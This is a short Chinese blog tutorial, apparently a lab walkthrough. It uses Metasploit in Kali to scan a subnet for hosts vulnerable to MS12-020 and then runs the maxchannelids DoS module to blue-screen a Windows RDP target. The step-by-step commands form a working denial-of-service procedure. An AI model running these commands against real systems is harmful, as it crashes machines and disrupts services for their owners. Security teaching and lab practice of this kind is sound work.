kali-蓝屏攻击(ms12-020)

打开kali终端,输入msfconsole,等待一段时间后,进入msf控制端

输入search ms12-020,这条指令是搜索ms12-020模块

kali-蓝屏攻击(ms12-020)_第1张图片

上面那个auxiliary/dos/windows/rdp/ms12_020_maxchannelids是攻击模块,我们先不看,先看下面的搜索模块

输入use auxiliary/scanner/rdp/ms12_020_check 

然后我们show options一下

kali-蓝屏攻击(ms12-020)_第2张图片

由于这个攻击需要靶机开启3389,所以我们的port默认是3389不要动,rhosts由于后面有s,所以很容易明白这可以设置成一个网段,也可以是一个ip,知道ip是更快的。为了更普遍,我们设成一个网段,这里时间较久,由于我的靶机是192.168.0.143

所以输入set RHOSTS 192.168.0.1/24

然后输入run或者exploit开始查找

kali-蓝屏攻击(ms12-020)_第3张图片

我们可以看到它已经再开始查找了,我们发现192.168.0.143前面是绿色的+,这是开启的意思。

kali-蓝屏攻击(ms12-020)_第4张图片

这时候我们就可以使用上面提到的auxiliary/dos/windows/rdp/ms12_020_maxchannelids模块了

输入use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

然后set RHOST 192.168.0.143(也可以先show options)

最后run

观测03靶机已经蓝屏了,重启就好了

kali-蓝屏攻击(ms12-020)_第5张图片

你可能感兴趣的:(kali-msf)